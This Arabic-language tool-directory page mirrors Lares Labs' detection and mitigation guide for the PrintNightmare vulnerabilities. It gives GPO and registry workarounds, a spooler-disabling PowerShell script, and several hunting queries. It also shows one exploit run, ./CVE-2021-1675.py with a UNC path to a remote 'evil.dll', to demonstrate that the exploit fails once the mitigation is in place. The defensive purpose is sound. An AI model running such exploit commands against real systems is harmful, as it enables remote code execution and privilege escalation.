Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-1675 — CVE-2021-1675 معلومات الاكتشاف | Kitploit
أدوات/GitHubGitHub/laresllc/cve-2021-1675
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتحقيق الجنائي الرقميالتعلم والتعليمالاستجابة للحوادثموارد منسقة
GitHublaresllc/cve-2021-1675

CVE-2021-1675

CVE-2021-1675 معلومات الاكتشاف

عرض المستودع
214384منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

من Lares Labs: معلومات الكشف والإصلاح لـ CVE-2021-1675 و CVE-2021-34527

🚨 تم إصدار التصحيح:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

تم تأكيد أن التصحيح يصلح الثغرة من نوع RCE ولكن يبدو أن تصعيد الامتيازات المحلية لم يتم تصحيحه بعد. لذلك، لا تزال الحلول البديلة المدرجة أدناه موصى بها.

يحتوي هذا المستودع على عينة EVTX لهجوم CVE-2021-1675 و CVE-2021-34527 بالإضافة إلى ملف تكوين Sysmon بسيط يمكن استخدامه لتوليد القياسات عن بُعد ذات الصلة.

يرجى ملاحظة أنه قد يتم تجاوز هذه القواعد - يرجى تطبيق التصحيح حسب الاقتضاء وتعطيل خدمة طابعة التخزين المؤقت (Print Spooler) على وحدات التحكم بالمجال.

يرجى اختبار جميع الإصلاحات الموصى بها قبل النشر في الإنتاج حيث قد تكون هناك عواقب غير مقصودة نتيجة لتغييرات التصلب هذه. لقد كتبنا منشورًا في المدونة يشرح محتوى هذا المستودع والمعلومات الموجودة. هنا: https://labs.lares.com/detection-and-mitigation-printnightmare/

فحص الثغرة بواسطة Marcello https://twitter.com/byt3bl33d3r

  • https://twitter.com/byt3bl33d3r/status/1412798525323157504

  • https://github.com/byt3bl33d3r/ItWasAllADream

مخطط التدفق

بفضل Benjamin Delpy، يوجد مخطط تدفق محدث حول قابلية استغلال هذه المشكلة لتحديد ما إذا كانت أنظمتك عرضة للخطر على الأرجح.

الإصلاحات الموضحة في مخطط التدفق أعلاه

  1. GPO: Security Settings -> System Services -> Print Spooler -> Disable
    1. Registry: HKLM\SYSTEM\CurrentControlSet\Services\Spooler\Start = 4
  2. GPO: Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections - > Disable
    1. Registry: HKLM\Software\Policies\Microsoft\Windows NT\Printers\RegisterSpoolerRemoteRpcEndPoint = 2
  3. GPO: Printers -> Point and Print Restrictions -> Security Prompts -> When installing drivers for a new connection -> Show warning and elevation prompt
    1. Registry: HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint = 0
  4. Registry: HKLM\SOFTWARE\Microsoft\Windows\CurrrentVersion\Policies\System\EnableLUA = 1

إصلاح بديل

التصحيح الذي أصدرته Microsoft في يونيو 2021 يصلح CVE-2021-1675 لكنه للأسف لا يصلح المشكلة المعروفة باسم PrintNighmare(CVE-2021-34527)، لذلك يمكن تطبيق إصلاح بديل عن طريق تعطيل خدمة طابعة التخزين المؤقت. إليك كيفية القيام بذلك على كل من GPO و PowerShell. تم تأكيد أن سياسة GPO تصلح كلاً من دالة MS-RPRN RpcAddPrinterDriverEx ودالة Win32 AddPrinterDriverEx التي يستخدمها SharpPrintNightmare.

GPO

يمكن تعيين سياسة GPO التالية لرفض اتصالات العملاء بمخزن الطباعة، وهو حل بديل محتمل عندما لا يكون تعطيل خدمة مخزن الطباعة بالكامل خيارًا متاحًا. تم اختبار ذلك ضد وحدات تحكم المجال ونقاط النهاية (W7/W10) في بيئة مختبرية ولا يزال بإمكان المستخدمين إضافة/إزالة الطابعات والطباعة ولكنه يمنع استغلال الثغرة. ملاحظة: من المفهوم أيضًا أن سياسة GPO هذه تصلح أيضًا CVE-2021-34527 كما هو مذكور في صفحة الثغرات من Microsoft.

Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections اضبط هذا على Disabled:

ثم أعد تشغيل خدمة مخزن الطباعة على المضيف المتأثر. إذا سارت الأمور بشكل جيد، سيتم رفض الوصول للاستغلال:

root@kitploit:~
./CVE-2021-1675.py lares.labs/[email protected] '\\certer.lares.labs\share\evil.dll'                                                                                    1 ⨯
Password:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.1.157[\PIPE\spoolss]
[-] Connection Failed

إزالة المستخدمين المصادق عليهم من مجموعة الوصول المتوافق مع ما قبل Windows 2000

إصلاح/حل بديل آخر هو إزالة المستخدمين المصادق عليهم من Pre-Windows 2000 Compatible Access كما اكتشف Dirk-jan.

تأكد من أن مجموعة "Authenticated Users" ليست عضوًا في مجموعة "Pre-Windows 2000 Compatible Access". (افتراضيًا، لا يتم تضمين هذه المجموعات في إصدارات Windows الحالية.) كما هو موضح في لقطة الشاشة أدناه، يجب ألا يكون هناك أعضاء:

إذا كنت في شك حول كيفية القيام بذلك، يمكن اتخاذ الخطوات التالية:

  1. افتح "Active Directory Users and Computers" (متاح من قوائم مختلفة أو قم بتشغيل "dsa.msc").
  2. وسّع المجال قيد المراجعة في الجزء الأيسر وحدد حاوية "Builtin".
  3. انقر نقرًا مزدوجًا على مجموعة "Pre-Windows 2000 Compatible Access" في الجزء الأيمن.
  4. حدد علامة التبويب "Members".
  5. إذا كانت مجموعات "Anonymous Logon" أو "Authenticated Users" أو "Everyone" أعضاءً، فحدد كلًا منها وانقر على "Remove".

PowerShell

تم تعديل نص 0gtweet لاستخدام ADDomainController لجلب جميع وحدات تحكم المجال من المجال

root@kitploit:~
# the script STOP and DISABLES Print Spooler service (aka #PrintNightmare) on each server from the list below IF ONLY DEFAULT PRINTERS EXIST.
# revert if you need: go to services.msc, find the "print spooler" service, change startup type to "automatic" and start the service.
# Source: https://github.com/gtworek/PSBits/blob/master/Misc/StopAndDisableDefaultSpoolers.ps1
#
# Requirements RSAT
# Get-Module -Name ActiveDirectory
# Import-Module -Name ActiveDirectory

$computers = Get-ADDomainController -filter * | %{ $_.name }

foreach ($computer in $computers)
{
    Write-Host "Processing $computer ..." 
    $service = Get-Service -ComputerName $computer -Name Spooler -ErrorAction SilentlyContinue
    if (!$service)
    {
        Write-Host "Cannot connect to Spooler Service on $computer. Skipping." -ForegroundColor Yellow
        continue
    }
    if ($service.Status -ne "Running")
    {
        Write-Host ("Service status is: """ + $service.Status + """. Skipping.") -ForegroundColor Yellow
        continue
    }
    $printers = (Get-WmiObject -class Win32_printer -ComputerName $computer)
    if (!$printers)
    {
        Write-Host "Cannot enumerate printers. Skipping." -ForegroundColor Yellow
        continue
    }

    $disableSpooler = $true
    foreach ($DriverName in ($printers.DriverName))
    {
        if (($DriverName -notmatch 'Microsoft XPS Document Writer') -and ($DriverName -notmatch 'Microsoft Print To PDF'))
        {
            Write-Host "  Printer found: $DriverName" -ForegroundColor Green
            $disableSpooler = $false
        }
    }
    if ($disableSpooler)
    {
        Write-Host "Only default printers found. Stopping and disabling spooler..." -ForegroundColor DarkCyan
        (Get-Service -ComputerName $computer -Name Spooler) | Stop-Service -Verbose
        Set-Service -ComputerName $computer -Name Spooler -StartupType Disabled -Verbose

    }
    else
    {
        Write-Host "Non-default printers found. Skipping." -ForegroundColor Green
    }
}

ملف تكوين Sysmon

يمكن تثبيت ملف تكوين Sysmon المقدم CVE-2021-1675.xml باستخدام Sysmon Config Pusher: https://github.com/LaresLLC/SysmonConfigPusher

استعلامات Splunk

root@kitploit:~
index=sysmon EventCode=7 Image="C:\\Windows\\System32\\spoolsv.exe" NOT (Signature="Microsoft Windows" SignatureStatus=Valid)
| stats values(ImageLoaded),values(TargetObject),values(Details),values(TargetFilename)

نهج بديل

طريقة عامة لصيد استغلال مخزن الطباعة هي البحث عن أخطاء يتم إنشاؤها بواسطة مخزن الطباعة بسبب تحميل DLL للحمولة. يمكن القيام بذلك إما عن طريق البحث عن ظهور WerFault.exe عن طريق spoolsv.exe أو إنشاء Event ID 7031 الذي يظهر إنهاء غير متوقع لخدمة مخزن الطباعة.

استعلام Splunk بديل

root@kitploit:~
((index=sysmon EventCode=1 
ParentImage="C:\\Windows\\System32\\spoolsv.exe" Image="C:\\Windows\\System32\\WerFault.exe") 
OR (index=windows Channel=System EventCode=7031 
Message="The Print Spooler service terminated unexpectedly"))

نهج إضافي

بعد عدة اختبارات لاستغلال تطبيق cube0x0 تم العثور على أثر إضافي: Event ID 5145 مع Share Name: \\*\IPC$ و Relative Target Name: spoolss. مزايا هذا النهج هي أنه يمكنك رؤية IP المصدر (Source Address) والحساب (Security ID أو Account Name) الذي تم استخدامه لتنفيذ الهجوم. قد تكون هناك نتائج إيجابية خاطئة من خوادم طباعة حقيقية، ولكن يمكن تصفيتها بواسطة اسم المضيف و Access Mask. قد تكون هناك نتائج إيجابية خاطئة أخرى يمكن تصفيتها بواسطة مجموعة hostname-username-access mask.

استعلام Splunk

root@kitploit:~
index=windows_security EventCode=5145 Share_Name="\\\\*\\IPC$" Relative_Target_Name=spoolss

استعلام KQL لـ Sentinel / MDE عبر Olaf Hartong

root@kitploit:~
let serverlist=DeviceInfo
| where DeviceType != "Workstation"
| distinct DeviceId;
let suspiciousdrivers=DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers"
| distinct SHA1
| invoke FileProfile(SHA1, 1000) 
| where GlobalPrevalence < 50 and IsRootSignerMicrosoft != 1 and SignatureState != "SignedValid";
suspiciousdrivers
| join kind=inner (DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers") on SHA1
| where InitiatingProcessFileName != "ccmexec.exe"

المصدر: https://twitter.com/olafhartong/status/1410229699993874442

ملاحظات Zeek

الأداة المستخدمة: https://github.com/cisagov/Malcolm

نقل ملف DLL:

مصادقة NTLM من الجهاز "المهاجم":

استدعاءات RPC ذات الصلة:

🟢 ملف PCAP متاح

🟢 سجل Zeek dce_rpc.log

استعلام صيد Carbon Black لـ CVE-2021-1675

المصدر: https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery/blob/main/README.md

  • 1 بناءً على قاعدة Sigma للكشف عن كود الإثبات
root@kitploit:~
filemod_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old\\1\\123
  • 2 بناءً على قاعدة Sigma للكشف عن كود الإثبات
root@kitploit:~
(modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3* OR modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old*) AND parent_cmdline:spoolsv\.exe
  • 3 بناءً على قاعدة Sigma للكشف عن كود الإثبات
root@kitploit:~
(modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3* OR modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old*) AND process_name:spoolsv\.exe
  • 4 كشف أحداث الملفات (غير الموقعة)، قم بضبط هذا وفقًا لخط الأساس الخاص بك. لم أحدد مسار برنامج التشغيل عن قصد هنا نظرًا لأن الاستغلال وما بعد الاستغلال لا يزالان غير واضحين بعض الشيء. تأكد من ضبط هذا وفقًا لخط الأساس الخاص بك (التجزئة المعروفة، إلخ).
root@kitploit:~
process_name:spoolsv\.exe AND NOT filemod_publisher_state:FILE_SIGNATURE_STATE_SIGNED
  • 5 كشف أحداث الملفات (موقعة من غير Microsoft)، قم بضبط هذا وفقًا لخط الأساس الخاص بك
root@kitploit:~
process_name:spoolsv\.exe AND filemod_publisher_state:FILE_SIGNATURE_STATE_SIGNED AND NOT filemod_publisher:"Microsoft Windows*"

المراجع

تغريدات تويتر تشير إلى الهجمات واستعلامات الصيد

  • https://twitter.com/ionstorm/status/1410258694386880518
  • https://twitter.com/dez_/status/1410298162548559875
  • https://twitter.com/markus_neis/status/1410255678996942854
  • https://twitter.com/cyb3rops/status/1410250996362715137
  • https://twitter.com/gentilkiwi/status/1410066827590447108
  • https://twitter.com/wdormann/status/1410198834970599425
  • https://twitter.com/NathanMcNulty/status/1410289115354914820
  • https://twitter.com/mvelazco/status/1410291741241102338
  • https://twitter.com/StanHacked/status/1410527329839980547
  • https://twitter.com/_dirkjan/status/1410618720460754947
  • https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery
  • https://twitter.com/cube0x0/status/1411364227089117185

ملاحظات وحدة تحكم المجال مقابل غير وحدة تحكم المجال عبر Benjamin Delpy:

  • https://twitter.com/gentilkiwi/status/1410614489167269892

مخطط تدفق مفيد جدًا عبر Stan Hegt من Outflank

  • https://twitter.com/StanHacked/status/1410922404252168196

تعيين CVE جديد من Microsoft:

  • https://twitter.com/msftsecresponse/status/1410768945590636548

يوميات SANS ICS:

  • https://isc.sans.edu/forums/diary/CVE20211675+Incomplete+Patch+and+Leaked+RCE+Exploit/27588/
تنزيل الأداة